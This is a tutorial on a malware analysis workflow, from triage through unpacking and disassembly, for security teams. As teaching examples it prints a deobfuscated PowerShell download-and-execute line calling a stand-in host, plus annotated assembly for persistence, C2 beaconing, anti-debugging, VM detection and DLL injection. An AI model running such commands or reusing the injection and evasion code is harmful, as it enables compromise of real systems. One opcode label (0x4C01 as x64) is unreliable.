Malware Analysis & Reverse Engineering: A Comprehensive Toolkit Workflow
In today's threat landscape, the ability to analyze and reverse engineer malicious software is critical for security teams, incident responders, and threat researchers. This comprehensive guide walks through a systematic malware analysis workflow that combines static analysis, dynamic analysis, and behavioral examination to identify threats, extract indicators of compromise (IOCs), and correlate findings with threat intelligence.
Whether you're a SOC analyst investigating a suspicious file, a security researcher tracking emerging threats, or an incident responder containing an active breach, this workflow provides the methodology and tools needed to thoroughly analyze malware samples from initial triage through final reporting.
Understanding the Analysis Landscape
Malware analysis exists on a spectrum from rapid automated triage to deep manual reverse engineering. Modern threats employ sophisticated evasion techniques including polymorphism, anti-debugging measures, virtual machine detection, and multi-stage payload delivery. A comprehensive analysis workflow must address all these challenges while maintaining analyst safety and operational security.
The workflow presented here spans approximately 5-15 hours for a complete analysis, though simple samples may be triaged in under an hour while advanced persistent threats (APTs) may require weeks of investigation. The key is understanding when to escalate from automated analysis to manual reverse engineering.
Time Investment by Complexity:
- Simple droppers/scripts: 1-3 hours
- Packed trojans: 3-6 hours
- Sophisticated ransomware: 6-12 hours
- APT toolkits: 12+ hours to weeks
Prerequisites and Safety Requirements
Before beginning any malware analysis, establish these critical safety measures:
Analysis Environment Isolation
Never analyze malware on production systems. Use fully isolated virtual machines with the following configuration:
- Network Isolation: Disconnect from production networks or use isolated virtual networks
- Snapshot Management: Take VM snapshots before each analysis stage
- Disposable Systems: Delete and rebuild analysis VMs after each sample
- Host-Only Networking: If network simulation needed, use FakeNet-NG or INetSim
- Clipboard Isolation: Disable clipboard sharing between host and guest
Recommended Analysis Platforms
REMnux Linux Distribution: Ubuntu-based distro with 100+ malware analysis tools pre-installed. Ideal for static analysis, script deobfuscation, and network simulation.
FlareVM: Windows-based malware analysis environment from FireEye/Mandiant. Contains IDA Free, x64dbg, PE analysis tools, and monitoring utilities. Use for analyzing Windows malware in its native environment.
Hybrid Approach: Use REMnux for initial triage and static analysis, then move to FlareVM for dynamic analysis and Windows-specific reverse engineering.
Legal and Ethical Considerations
- Only analyze malware obtained through legitimate channels (incident response, threat feeds, malware repositories)
- Respect intellectual property and licensing restrictions on analysis tools
- Follow responsible disclosure practices when sharing findings
- Coordinate with legal/compliance before sharing IOCs externally
- Document chain of custody for forensic investigations
Stage 1: Initial Triage & Safe Environment Setup
Duration: 15-30 minutes
Initial triage establishes the foundation for your analysis. The goal is to quickly classify the sample, determine its risk level, and decide on the appropriate analysis approach without executing the malware.
Step 1: File Type Validation with Magic Number Analysis
Malware commonly uses file extension spoofing to bypass basic filters. A file named invoice.pdf might actually be a Windows executable. The File Magic Number Checker examines the file's actual binary signature to reveal its true type.
Magic Number Examples:
- PE executables:
4D 5A(MZ header) - ELF binaries:
7F 45 4C 46(.ELF) - ZIP archives:
50 4B 03 04(PK..) - PDF documents:
25 50 44 46(%PDF) - JPEG images:
FF D8 FF E0orFF D8 FF E1
Polyglot Detection: Some sophisticated malware combines multiple file formats (e.g., valid PDF + embedded PE) to evade analysis. Magic number analysis reveals these dual-format files.
Practical Example:
File: "Resume.pdf"
Extension suggests: PDF Document
Magic number: 4D 5A 90 00
Actual type: PE32 executable (Windows)
Verdict: SUSPICIOUS - Extension spoofing detected
This immediate mismatch flags the file for deeper investigation and prevents accidental execution.
Step 2: Hash Generation and Reputation Checking
Generate cryptographic hashes to create unique identifiers for the sample and check against known malware databases using the Hash Generator.
Hash Types and Use Cases:
MD5 (128-bit): Fast but collision-prone. Still widely used in threat intel feeds.
MD5: 44d88612fea8a8f36de82e1278abb02f
SHA-1 (160-bit): Better collision resistance than MD5. Common in VirusTotal lookups.
SHA-1: 3395856ce81f2b7382dee72602f798b642f14140
SHA-256 (256-bit): Industry standard for file integrity. No known collisions.
SHA-256: 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92
VirusTotal Integration: Submit hashes (never the file itself during initial triage) to check if the sample has been previously analyzed. A detection ratio like "45/70" indicates 45 of 70 antivirus engines flagged it as malicious.
Threat Intelligence Correlation: Use Hash Lookup to query multiple threat intelligence sources:
- AlienVault OTX (Open Threat Exchange)
- Abuse.ch MalwareBazaar
- Hybrid Analysis
- MISP communities
Known Sample Example:
SHA-256: 2c21b4b39df46e38868a7a5329b8faa8...
VirusTotal: 67/71 detections
Family: Emotet (epoch 5)
First seen: 2021-03-15
Campaign: TA542 phishing
If the sample is well-known, you can often skip detailed analysis and jump to remediation using existing IOCs and YARA rules.
Step 3: Entropy Analysis for Packing Detection
Entropy measures the randomness of data within a file. High entropy (7.0-8.0) typically indicates compression, encryption, or packing—techniques malware uses to hide its true payload from antivirus signatures.
Use the Entropy Analyzer to calculate entropy across the entire file and within individual sections.
Entropy Interpretation:
- 0.0-3.0: Plain text, highly structured data
- 3.0-5.0: Compiled code (normal executables)
- 5.0-7.0: Compressed data or mixed content
- 7.0-8.0: Encrypted or packed data (SUSPICIOUS)
Practical Example - Packed Malware:
File: malware.exe (245 KB)
Overall entropy: 7.82
Section Analysis:
.text: entropy 7.91 (SUSPICIOUS - executable code should be 4-6)
.data: entropy 7.88 (SUSPICIOUS - encrypted data)
.rsrc: entropy 3.21 (normal)
Verdict: Highly likely packed with UPX, ASPack, or custom packer
Action: Proceed to Stage 3 (Unpacking) before analysis
Entropy Sections in PE Files:
.textsection: Should be 4.0-6.0 (normal x86 code).datasection: Varies based on content (3.0-6.0 typical).rsrcsection: Often low entropy (bitmaps, icons)
If the .text section shows entropy above 7.0, the executable code is almost certainly packed or encrypted.
Step 4: VM Snapshot and Environment Preparation
Before proceeding to dynamic analysis stages, prepare your analysis environment:
Snapshot Creation:
# VMware Workstation
vmrun snapshot "C:\\VMs\\MalwareAnalysis.vmx" "Pre-Analysis-Clean"
# VirtualBox
VBoxManage snapshot "MalwareAnalysis" take "Pre-Analysis-Clean"
Network Configuration:
- Set VM to "Host-Only" or "Internal Network" mode
- Launch FakeNet-NG (Windows) or INetSim (Linux) for network simulation
- Configure DNS to redirect all lookups to local analysis server
Monitoring Tool Setup (for later dynamic analysis):
- Process Monitor (procmon.exe) - File/registry/process activity
- Process Hacker - Process tree and memory inspection
- Wireshark - Network packet capture
- Regshot - Registry snapshot comparison
Stage 1 Deliverables
At the end of initial triage, you should have:
-
File Classification Report
- True file type (vs. claimed extension)
- File size and structural anomalies
-
Hash Fingerprints
- MD5, SHA-1, SHA-256 values
- VirusTotal detection ratio
- Known malware family identification (if available)
-
Packing Assessment
- Overall entropy score
- Section-by-section entropy analysis
- Packer identification (UPX, ASPack, etc.)
-
Initial Threat Level
- HIGH: Known malware family, high entropy, suspicious file type
- MEDIUM: Unknown sample, moderate entropy, requires deeper analysis
- LOW: Known benign, normal entropy, legitimate provenance
This triage determines whether to proceed with full analysis or escalate to specialized teams.
Stage 2: Static Analysis & File Structure Examination
Duration: 30-60 minutes
Static analysis examines the malware without executing it, extracting valuable intelligence from embedded strings, file structure, and metadata. This stage is safe (no code execution) and often reveals significant IOCs.
Step 1: String Extraction and Analysis
Malware contains hardcoded strings—URLs, IP addresses, file paths, encryption keys, and debug messages. Extracting these provides immediate intelligence about capabilities and infrastructure.
Use the String Extractor to pull both ASCII and Unicode strings from the binary.
String Categories to Identify:
1. Network Indicators:
http://malicious-c2.example.com/gate.php
192.168.1.100:8080
api.telegram.org
smtp.gmail.com
2. File System Paths:
C:\\Users\\Public\\svchost.exe
%APPDATA%\\Microsoft\\Windows\\Templates\\
\\\\.\\pipe\\namedpipe
C:\\Windows\\System32\\drivers\\malware.sys
3. Registry Keys:
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
HKCU\\Software\\Classes\\exefile\\shell\\open\\command
4. Debugging Artifacts:
[+] Connecting to C2...
[DEBUG] Payload decrypted successfully
Failed to inject into process
C:\\Projects\\Malware\\Release\\trojan.pdb
5. Encryption/Encoding Indicators:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
(Base64 alphabet - indicates encoding/decoding)
Mozilla/5.0 (Windows NT 10.0; Win64; x64)
(User-agent strings for HTTP communication)
Real-World Example - Emotet String Analysis:
Extracted strings (sample): 4,892 total
Network IOCs:
- hxxp://185.157.82[.]211/wp-content/Dh9aQqY/
- hxxp://195.154.146[.]35/cgi-bin/Y3wd1/
- hxxp://217.182.143[.]207/images/k8wKN/
File Paths:
- %LOCALAPPDATA%\\Microsoft\\Windows\\
- C:\\Windows\\SysWOW64\\
Registry:
- Software\\Microsoft\\Windows\\CurrentVersion\\Run
Artifacts:
- service.exe
- regsvr32.exe /s
These URLs immediately identify C2 infrastructure for blocking. The registry key shows persistence mechanism. File paths reveal likely drop locations.
Step 2: Binary Structure Analysis with Hex Editor
The Hex Editor allows direct examination of the binary file structure, revealing details hidden from high-level analysis tools.
PE File Structure Components:
DOS Header (offset 0x00):
00000000: 4D 5A 90 00 03 00 00 00 MZ......
The "MZ" signature identifies Windows executables. The DOS stub is mostly vestigial but malware sometimes hides data here.
PE Header (offset varies, typically 0x80-0x100):
000000D0: 50 45 00 00 4C 01 06 00 PE..L...
"PE\0\0" marks the PE header. Following bytes indicate:
- Machine type (0x4C01 = x64, 0x014C = x86)
- Number of sections
- Timestamp (often forged by malware)
- Optional header size
Section Table:
Each section has characteristics flags:
IMAGE_SCN_MEM_EXECUTE(0x20000000): Executable codeIMAGE_SCN_MEM_WRITE(0x80000000): Writable dataIMAGE_SCN_MEM_READ(0x40000000): Readable
Suspicious Pattern - Writable + Executable Section:
Section: .text
Virtual Size: 0x00045000
Raw Size: 0x00045200
Characteristics: 0xE0000020 (READ | WRITE | EXECUTE)
VERDICT: SUSPICIOUS
Normal executables have RX (read+execute) .text sections.
Writable executable sections enable self-modifying code.
Import Address Table (IAT) Analysis:
The IAT lists external functions the malware calls. Suspicious APIs include:
Process Manipulation:
CreateRemoteThread- Code injectionWriteProcessMemory- Memory manipulationVirtualAllocEx- Allocate memory in other processes
Anti-Debugging:
IsDebuggerPresent- Debugger detectionCheckRemoteDebuggerPresentNtQueryInformationProcess
Persistence:
RegSetValueEx- Registry modificationCreateService- Service installationScheduleTask- Scheduled task creation
Network Communication:
InternetOpenA/W- HTTP communicationHttpSendRequestA/W- HTTP requestsWSAStartup- Raw socket communication
Example IAT from Ransomware:
KERNEL32.dll:
- CreateFileW (file access)
- WriteFile (file modification)
- FindFirstFileW (directory enumeration)
- CryptEncrypt (encryption)
ADVAPI32.dll:
- RegSetValueExW (persistence)
- LookupPrivilegeValueW (privilege escalation)
WININET.dll:
- InternetOpenA (C2 communication)
- HttpSendRequestA (data exfiltration)
This IAT signature immediately suggests ransomware behavior: file enumeration + encryption + persistence + C2 communication.
Step 3: IOC Extraction and Cataloging
Use the IOC Extractor to automatically parse the sample and extract indicators:
IOC Categories:
Network Indicators:
- IPv4 addresses:
192.168.1.1,10.0.0.0/8 - IPv6 addresses:
2001:0db8:85a3::8a2e:0370:7334 - Domain names:
malware.com,c2.evil.net - URLs:
http://attacker.com/payload.exe - Email addresses:
[email protected]
Host Indicators:
- File paths:
C:\\Windows\\Temp\\malware.exe - Registry keys:
HKLM\\Software\\Malware - Mutex names:
Global\\MalwareMutex - Service names:
MalwareService
Cryptocurrency Indicators:
- Bitcoin addresses:
1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa - Monero addresses:
4AdUndXHHZ6cfufTMvppY6JwXNouMBzSkbLYfpAV5Usx3skxNgYeYTRj5UzqtReoS44qo9mtmXCqY45DJ852K5Jv2684Rge - Ethereum addresses:
0x742d35Cc6634C0532925a3b844Bc9e7595f0bEb
Practical IOC Extraction Example:
Analysis of: invoice.exe (SHA-256: 8d969eef...)
Network IOCs (12 found):
- 185.157.82.211
- 195.154.146.35
- 217.182.143.207
- update.adobe-flash-player.com (spoofed domain)
- hxxp://malware[.]cc/gate.php
File IOCs (8 found):
- %APPDATA%\\Microsoft\\svchost.exe
- C:\\Users\\Public\\readme.txt
- C:\\Windows\\Temp\\payload.dll
Registry IOCs (3 found):
- HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate
- HKLM\\System\\CurrentControlSet\\Services\\MalwareService
Cryptocurrency (1 found):
- 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 (Bitcoin ransom address)
Step 4: IOC Defanging for Safe Sharing
Before sharing IOCs with team members or external threat intelligence platforms, defang them to prevent accidental clicks or execution.
Use the URL Defanger to convert IOCs to safe formats:
Defanging Transformations:
Original: http://malware.com/payload.exe
Defanged: hxxp://malware[.]com/payload.exe
Original: https://evil.net/gate.php?id=123
Defanged: hxxps://evil[.]net/gate[.]php?id=123
Original: 192.168.1.100
Defanged: 192[.]168[.]1[.]100
Original: [email protected]
Defanged: attacker[@]evil[.]com
This prevents accidental navigation while keeping the IOC readable and searchable.
Step 5: PE Structure Deep Dive
Export Analysis:
If the malware is a DLL, examine its export table for exposed functions:
Exported Functions (malware.dll):
- ServiceMain (masquerading as legitimate service)
- DllRegisterServer (COM registration - persistence)
- InstallHook (keylogger installation)
- SendData (exfiltration function)
Legitimate DLLs have meaningful export names. Malware often uses generic names or mimics system DLLs.
Resource Section Analysis:
The .rsrc section contains embedded resources like icons, bitmaps, configuration files, and secondary payloads.
Use Resource Hacker or PE-bear to extract:
Resources found:
- ICON (mimics PDF icon - social engineering)
- RCDATA/CONFIG (encrypted C2 configuration)
- BINARY/PAYLOAD (embedded DLL or shellcode)
Timestamp Analysis:
PE headers contain compilation timestamps, though malware often forges these:
Compilation time: 1970-01-01 00:00:00 (Unix epoch)
Analysis: Timestamp zeroed - malware is hiding build time
vs.
Compilation time: 2024-12-15 03:47:22
Analysis: Recent build - potentially active campaign
Cross-reference timestamps with first-seen dates in threat intelligence to detect forgery.
Stage 2 Deliverables
-
Extracted Strings Report
- Categorized strings (network, filesystem, registry, crypto)
- Suspicious patterns identified
- Debug artifacts and PDB paths
-
Comprehensive IOC List
- IP addresses and domains (defanged)
- File paths and registry keys
- Mutex names and service identifiers
- Cryptocurrency addresses
-
PE Structure Analysis
- Section table with entropy per section
- Import Address Table (suspicious APIs highlighted)
- Export table analysis (if DLL)
- Resource extraction results
-
Anti-Analysis Technique Identification
- Debugger detection APIs
- VM detection patterns
- Timing checks (RDTSC)
- Obfuscation indicators
Stage 3: Deobfuscation & Unpacking
Duration: 1-3 hours
Many malware samples employ packing (compression + encryption) to evade signature-based detection and hinder analysis. Before meaningful reverse engineering can occur, the true payload must be extracted.
Understanding Packing and Obfuscation
Packing combines compression and encryption to hide malware's true code. The packed executable contains:
- Stub/Unpacker: Small piece of code that runs first
- Packed Payload: Compressed/encrypted actual malware
- Unpacking Routine: Decompresses and decrypts payload into memory
- Transfer of Execution: Jumps to unpacked code
Common Packer Families:
UPX (Ultimate Packer for eXecutables)
- Open-source, most common packer
- Easily detected:
UPX0,UPX1section names - Can be unpacked with:
upx -d malware.exe
Commercial Packers:
- ASPack: Popular commercial packer
- PECompact: Compression + anti-debugging
- Themida/VMProtect: Advanced virtualization-based protection
- Enigma Protector: Anti-tampering + licensing
Custom Packers:
- Built specifically for malware campaigns
- No automated unpacking tools available
- Require manual analysis and memory dumping
Step 1: Packer Identification
Use entropy analysis results from Stage 1 combined with section name analysis:
UPX Detection:
Section names: UPX0, UPX1, UPX2
Entry point: .UPX1 section
Entropy: 7.8 (packed)
Detection: UPX packer
Action: Automated unpacking with 'upx -d'
ASPack Detection:
Section names: .aspack, .adata
Import table: Minimal imports (GetProcAddress, LoadLibrary only)
Entropy: 7.6
Detection: ASPack
Action: Manual unpacking with debugger
Custom Packer Detection:
Section names: .text, .data (normal names)
Entry point: Unusual location (mid-.text section)
Import table: Only kernel32.dll (VirtualAlloc, VirtualProtect)
Entropy: 7.9
Detection: Custom packer
Action: Advanced manual unpacking required
Step 2: Automated Unpacking (UPX and similar)
For known packers with available tools:
# UPX unpacking
upx -d malware_packed.exe -o malware_unpacked.exe
# Verify unpacking success
entropy-analyzer malware_unpacked.exe
# Expected: Entropy drops to 4.5-6.5 range
Before and After Comparison:
BEFORE unpacking:
File: malware.exe (245 KB)
Entropy: 7.82
Sections: UPX0, UPX1
Imports: 4 functions
AFTER unpacking:
File: malware.exe (812 KB)
Entropy: 5.31
Sections: .text, .data, .rdata, .rsrc
Imports: 127 functions
The dramatic increase in size and import count confirms successful unpacking.
Step 3: Manual Unpacking with Debugger
For custom or unknown packers, use x64dbg or OllyDbg for manual unpacking.
Unpacking Methodology:
1. Set Memory Breakpoint on VirtualProtect/VirtualAlloc:
Packers allocate memory and change protection to executable (PAGE_EXECUTE_READWRITE) before transferring control.
Breakpoint: kernel32.VirtualProtect
When hit: Examine parameters
- lpAddress: Memory region being modified
- dwSize: Size of region
- flNewProtect: New protection (0x40 = PAGE_EXECUTE_READWRITE)
Action: Set hardware breakpoint on lpAddress
2. Follow JMP/CALL to Original Entry Point (OEP):
After unpacking, the stub transfers control to the real malware code via JMP or CALL.
Typical unpacking stub finale:
004012F5: PUSH 00401000 ; Push OEP address
004012FA: RETN ; Return to OEP
or
004012F5: JMP 00405000 ; Jump to OEP
3. Dump Memory at OEP:
Once execution reaches the original entry point, dump the unpacked code from memory.
x64dbg: Right-click > Dump > Dump module to file
OllyDbg: Plugins > OllyDumpEx > Dump process
4. Fix Import Table:
Packers destroy the original import table. Rebuild it using Scylla or ImpREC.
Scylla steps:
1. Attach to unpacked process at OEP
2. IAT Autosearch
3. Get Imports
4. Fix Dump (select dumped file)
Real-World Example - ASPack Unpacking:
1. Load malware.exe in x64dbg
2. Set breakpoint on VirtualProtect
3. Run (F9) - breaks at first VirtualProtect call
4. Examine parameters:
- Address: 0x00400000
- Size: 0x0001E000
- NewProtect: PAGE_EXECUTE_READWRITE
5. Set hardware breakpoint on execution at 0x00400000
6. Continue execution (F9)
7. Breakpoint hits at OEP: 0x00401550
8. Dump memory: 0x00400000 - 0x0041E000
9. Fix imports with Scylla
10. New file: malware_unpacked.exe (679 KB)
11. Verify entropy: 5.42 (successful unpack)
Step 4: Script Deobfuscation
Malware often uses obfuscated scripts (PowerShell, JavaScript, VBScript) as droppers or second-stage payloads.
Use the Malware Deobfuscator for common obfuscation schemes.
Script Deobfuscation Examples:
PowerShell:
# Obfuscated
${e`Xp`R}=[SyST`em.TeXT.eNcODI`Ng]::uTf8.gETs`TrING([sy`sTEM.cOn`VERt]::FRO`MBa`SE64stRIng('aQBlAHgA...'));
IeX ${eXpr}
# Deobfuscated
iex (New-Object Net.WebClient).DownloadString('hxxp://malware.com/payload.ps1')
Common Techniques:
- Base64 Encoding:
YWxlcnQoMSk=→alert(1) - Hex Encoding:
\\x48\\x65\\x6c\\x6c\\x6f→Hello - Character Substitution:
${e`Xp`R}→$expr - XOR Encryption: Single or multi-byte keys
Sophisticated malware uses multiple layers. The Malware Deobfuscator handles common schemes automatically, but custom encryption requires manual analysis.
Step 5: Verify Successful Unpacking
After unpacking, verify success:
Entropy Check:
Packed: 7.82 (SUSPICIOUS)
Unpacked: 5.31 (NORMAL)
Result: SUCCESSFUL unpack
Import Table Expansion:
Packed: 4 imports (GetProcAddress, LoadLibrary, VirtualAlloc, VirtualProtect)
Unpacked: 127 imports (Complete API list visible)
Result: SUCCESSFUL unpack + import rebuild
String Extraction Comparison:
Packed: 47 readable strings
Unpacked: 2,891 readable strings
Result: SUCCESSFUL unpack - full string table exposed
Functional Testing:
Load the unpacked binary in IDA Pro or Ghidra. If you see meaningful function names, control flow graphs, and recognizable code patterns (not garbage), the unpack succeeded.
Stage 3 Deliverables
-
Unpacked Binary
- Decompressed/decrypted executable
- Fixed import table
- Ready for static and dynamic analysis
-
Deobfuscated Scripts
- PowerShell, JavaScript, VBScript in readable form
- Decoded URLs and commands
- Embedded payloads extracted
-
Updated Entropy Analysis
- Before/after comparison
- Confirmation of successful unpacking
-
Packer Identification Report
- Packer family (UPX, ASPack, custom)
- Unpacking method used
- Challenges encountered
Stage 4: Disassembly & Reverse Engineering
Duration: 2-6 hours
With the unpacked binary in hand, reverse engineering begins. This stage translates machine code back to assembly language and analyzes program logic to understand malware capabilities.
Understanding Assembly Language
Modern malware targets multiple architectures:
- x86 (32-bit): Legacy systems, embedded devices
- x64 (64-bit): Modern Windows/Linux systems
- ARM: Mobile devices, IoT malware
Syntax Variations:
Intel Syntax (Windows standard):
mov eax, 0x12345678 ; destination, source
call function_name
AT&T Syntax (Linux standard):
movl $0x12345678, %eax ; source, destination
call function_name
The Machine Code Disassembler supports both syntaxes and all major architectures.
Step 1: Locating the Entry Point
Every executable begins at an entry point—the first instruction executed when the program loads.
PE Entry Point:
PE Header → Optional Header → AddressOfEntryPoint
Typical location: .text section offset 0x1000
Example Entry Point Code:
.text:00401000 push ebp ; Standard function prologue
.text:00401001 mov ebp, esp
.text:00401003 sub esp, 0x40 ; Allocate 64 bytes for local variables
.text:00401006 call sub_401500 ; Call initialization function
.text:0040100B call sub_402000 ; Call main malware logic
.text:00401010 xor eax, eax ; Return 0
.text:00401012 leave
.text:00401013 retn
Step 2: Analyzing Key Malware Functions
Focus on functions that perform malicious activities:
Persistence Mechanism Analysis:
; Registry persistence - Set Run key
.text:00401500 push 0 ; Reserved
.text:00401502 push 0x20006 ; KEY_SET_VALUE | KEY_CREATE_SUB_KEY
.text:00401507 push offset aRun ; "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
.text:0040150C push 0x80000001 ; HKEY_CURRENT_USER
.text:00401511 lea eax, [ebp-0x10]
.text:00401514 push eax ; phkResult
.text:00401515 call RegOpenKeyExA
.text:0040151A test eax, eax
.text:0040151C jnz short error_handler
.text:0040151E push 0x23 ; cbData = 35 bytes
.text:00401520 push offset malware_path ; "C:\\\\Users\\\\Public\\\\svchost.exe"
.text:00401525 push 0 ; Reserved
.text:00401527 push 1 ; REG_SZ
.text:00401529 push offset aWindowsupdate ; "WindowsUpdate"
.text:0040152E push [ebp-0x10] ; hKey
.text:00401531 call RegSetValueExA
Analysis: This code creates registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate pointing to C:\\Users\\Public\\svchost.exe, ensuring malware runs at system startup.
C2 Communication Function:
; HTTP beacon to C2 server
.text:00402000 push offset aMozilla50 ; User-Agent string
.text:00402005 push 0 ; dwAccessType (INTERNET_OPEN_TYPE_PRECONFIG)
.text:00402007 call InternetOpenA
.text:0040200C mov edi, eax ; hInternet
.text:0040200E test edi, edi
.text:00402010 jz short error_handler
.text:00402012 push 0 ; dwContext
.text:00402014 push 0x80000000 ; INTERNET_FLAG_RELOAD
.text:00402019 push 0 ; lpszReferer
.text:0040201B push 0 ; lplpszAcceptTypes
.text:0040201D push 0 ; lpszVersion
.text:0040201F push offset aGatePhp ; "/gate.php"
.text:00402024 push offset aC2Domain ; "185.157.82.211"
.text:00402029 push edi ; hInternet
.text:0040202A call InternetOpenUrlA
.text:0040202F mov esi, eax ; hUrlFile
.text:00402031 push esi
.text:00402032 lea eax, [ebp-0x100]
.text:00402038 push 0x100 ; Buffer size
.text:0040203D push eax ; lpBuffer
.text:0040203E call InternetReadFile ; Read C2 response
Analysis: Malware contacts http://185.157.82.211/gate.php to receive commands. This provides C2 infrastructure IOC for blocking.
Step 3: Identifying Anti-Analysis Techniques
Debugger Detection:
; IsDebuggerPresent check
.text:00403000 call IsDebuggerPresent
.text:00403005 test eax, eax
.text:00403007 jz short normal_execution
; If debugger detected
.text:00403009 push 0 ; Exit code
.text:0040300B call ExitProcess ; Terminate immediately
Timing Checks (RDTSC):
; Execute RDTSC twice and compare (detects single-stepping)
.text:00403100 rdtsc ; Read timestamp counter
.text:00403102 mov edi, eax ; Save first timestamp
.text:00403104
.text:00403104 ; Perform some operations
.text:00403104 xor eax, eax
.text:00403106
.text:00403106 rdtsc ; Read timestamp again
.text:00403108 sub eax, edi ; Calculate delta
.text:0040310A cmp eax, 0x1000 ; If delta > 4096 cycles
.text:0040310F ja short debugger_detected ; Debugger likely present
VM Detection:
; Check for VMware using I/O port backdoor
.text:00403200 push ebx
.text:00403201 push ecx
.text:00403202 push edx
.text:00403203
.text:00403203 mov eax, 564D5868h ; 'VMXh' magic number
.text:00403208 mov ebx, 0 ; Subcommand
.text:0040320D mov ecx, 10 ; Command (get VMware version)
.text:00403212 mov edx, 5658h ; 'VX' port number
.text:00403217 in eax, dx ; VMware backdoor I/O
.text:00403218
.text:00403218 cmp ebx, 564D5868h ; If EBX = 'VMXh'
.text:0040321E je short vm_detected ; Running in VMware
Step 4: Process Injection Analysis
Advanced malware injects code into legitimate processes to evade detection.
Classic DLL Injection:
; 1. Allocate memory in target process
.text:00404000 push 0x40 ; PAGE_EXECUTE_READWRITE
.text:00404002 push 0x3000 ; MEM_COMMIT | MEM_RESERVE
.text:00404007 push 0x1000 ; Size = 4096 bytes
.text:0040400C push 0 ; lpAddress (let system choose)
.text:0040400E push [hTargetProcess]
.text:00404011 call VirtualAllocEx
.text:00404016 mov [lpRemoteBuffer], eax
; 2. Write malicious DLL path to target process memory
.text:00404019 push 0 ; lpNumberOfBytesWritten
.text:0040401B push 0x104 ; Size
.text:00404020 push offset aDllPath ; "C:\\\\malware.dll"
.text:00404025 push [lpRemoteBuffer]
.text:00404028 push [hTargetProcess]
.text:0040402B call WriteProcessMemory
; 3. Get address of LoadLibraryA
.text:00404030 push offset aLoadlibrarya ; "LoadLibraryA"
.text:00404035 push offset aKernel32Dll ; "kernel32.dll"
.text:0040403A call GetProcAddress
.text:0040403F mov [lpLoadLibrary], eax
; 4. Create remote thread to execute LoadLibrary
.text:00404042 push 0 ; lpThreadId
.text:00404044 push 0 ; dwCreationFlags
.text:00404046 push [lpRemoteBuffer] ; lpParameter (DLL path)
.text:00404049 push [lpLoadLibrary] ; lpStartAddress (LoadLibraryA)
.text:0040404C push 0 ; dwStackSize
.text:0040404E push 0 ; lpThreadAttributes
.text:00404050 push [hTargetProcess]
.text:00404053 call CreateRemoteThread
Analysis: This code injects malware.dll into another process by:
- Allocating memory in the target
- Writing the DLL path
- Creating a thread that calls LoadLibrary with the DLL path
The malware now runs within a legitimate process (e.g., explorer.exe), evading process-based detection.
Step 5: Encryption and Encoding Analysis
XOR Decryption Loop:
; Decrypt embedded configuration with XOR key
.text:00405000 mov esi, offset encrypted_config ; Source
.text:00405005 mov edi, offset decrypted_config ; Destination
.text:0040500A mov ecx, 0x200 ; Length = 512 bytes
.text:0040500F mov bl, 0xAA ; XOR key = 0xAA
.text:00405011 decrypt_loop:
.text:00405011 lodsb ; Load byte from [ESI]
.text:00405012 xor al, bl ; XOR with key
.text:00405014 stosb ; Store to [EDI]
.text:00405015 loop decrypt_loop ; Repeat ECX times
Analysis: Simple single-byte XOR with key 0xAA. Can decrypt the configuration by XORing the encrypted_config bytes with 0xAA.
RC4 Stream Cipher:
; RC4 encryption (common in malware C2 communication)
.text:00406000 ; Initialize S-box
.text:00406000 xor ecx, ecx
.text:00406002 init_sbox:
.text:00406002 mov [sbox+ecx], cl
.text:00406006 inc ecx
.text:00406007 cmp ecx, 0x100
.text:0040600D jb short init_sbox
; KSA (Key Scheduling Algorithm) omitted for brevity
; PRGA (Pseudo-Random Generation Algorithm)
.text:00406100 xor esi, esi ; i = 0
.text:00406102 xor edi, edi ; j = 0
.text:00406104 encrypt_byte:
.text:00406104 inc esi ; i++
.text:00406105 and esi, 0xFF ; i %= 256
.text:0040610B movzx eax, byte ptr [sbox+esi]
.text:00406112 add edi, eax ; j += S[i]
.text:00406114 and edi, 0xFF ; j %= 256
.text:0040611A ; Swap S[i] and S[j]...
Analysis: RC4 encryption indicates sophisticated C2 protocol. Need to extract the RC4 key from memory during dynamic analysis to decrypt traffic.
Step 6: Domain Generation Algorithm (DGA)
Sophisticated malware generates domain names algorithmically to evade C2 blacklisting.
Simple Date-Based DGA:
; Generate daily C2 domain based on current date
.text:00407000 call GetSystemTime
.text:00407005 movzx eax, word ptr [stSystemTime.wYear]
.text:0040700C movzx ebx, word ptr [stSystemTime.wMonth]
.text:00407013 movzx ecx, word ptr [stSystemTime.wDay]
.text:0040701A
.text:0040701A ; Seed = (Year * 10000) + (Month * 100) + Day
.text:0040701A imul eax, 10000
.text:00407020 imul ebx, 100
.text:00407026 add eax, ebx
.text:00407028 add eax, ecx
.text:0040702A
.text:0040702A ; Use seed to generate random string
.text:0040702A mov [rng_seed], eax
.text:0040702F call generate_domain_string ; Creates "xjkdh28f.com"
Analysis: This DGA generates different domains daily based on the date. Security teams must generate the same domain list to preemptively block C2 infrastructure.
Step 7: Control Flow Graph Analysis
Use IDA Pro or Ghidra to generate control flow graphs showing program logic:
[Entry Point]
|
v
[Anti-Debug Check] --> [Debugger Detected] --> [Exit]
|
v
[Decrypt Config]
|
v
[Establish Persistence] --> [Registry Modification]
|
v
[C2 Communication Loop]
|
+---> [Send Beacon] --> [Receive Commands]
| | |
| v v
| [Sleep 60s] [Command Dispatcher]
| | |
| | +---> [Download File]
| | +---> [Execute Payload]
| | +---> [Exfiltrate Data]
| | +---> [Update Malware]
| | |
+<----------+<------------------+
This visualization clarifies malware behavior: anti-debugging check, config decryption, persistence, then infinite C2 beacon loop.
Stage 4 Deliverables
-
Disassembly Listing
- Complete assembly code with comments
- Function names and cross-references
- Identified code sections (initialization, persistence, C2, etc.)
-
Function Call Graph
- Visual representation of function relationships
- Critical path analysis (entry point → main malware logic)
-
API Call Summary
- All Windows API calls categorized by function
- Suspicious API combinations highlighted
- Import table reconstruction
-
Malware Capability Matrix
